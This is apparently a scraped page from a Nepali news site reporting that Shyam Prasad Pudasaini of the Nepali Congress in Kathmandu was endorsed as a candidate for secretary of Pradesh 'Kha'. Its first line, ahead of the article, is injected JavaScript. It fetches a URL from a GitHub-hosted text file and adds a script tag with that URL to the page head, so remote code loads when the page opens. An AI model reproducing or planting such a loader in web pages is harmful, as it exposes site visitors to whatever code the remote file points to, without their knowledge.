;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाण्डौ | नेपालि काँग्रेस काठमाडौँ क्षेत्र नं ३ अन्तर्गत कागेश्वारी मनोहरा नगरपालिका वडा नं ३, निवासी श्याम प्रसाद पुडासैनीले प्रदेश ‘ख’ को सचिबमा उम्मेदवार चयन भएका छन् | आज नयाँपाटी पार्टी प्यालेसमा भएको उम्मेदवारी घोषणा कार्यक्रममा सम्पूर्ण कार्यसमिति प्रदेश प्रतिनिधिको नाम प्रस्ताब गरि क्षेत्रीय सभापति सन्तोष चालिसेले समर्थन गरेका हुन् | उनको सभापतिका उम्मेदवार श्रीकृष्ण थापा समुहा बाट नाम आएको हो |
नेपाल तरुण दलमा लामो समय देखि काम गर्दै आएका पुडाशैनी हाल प्रदेश ख को सचिबमा उम्मेदारी समर्थन भएको हो |
उनले प्रदेशलाइ अझ बढी मजबुत बनाइ भात्री संगठन, क्रियाशील सदस्य लगायत कांग्रेसका सुभचिन्तक सबैलाइ समेटी पार्टीलाई अगाडी बढाउने बेला आएको बताएका छन् |
फेसबुक प्रतिक्रियाहरु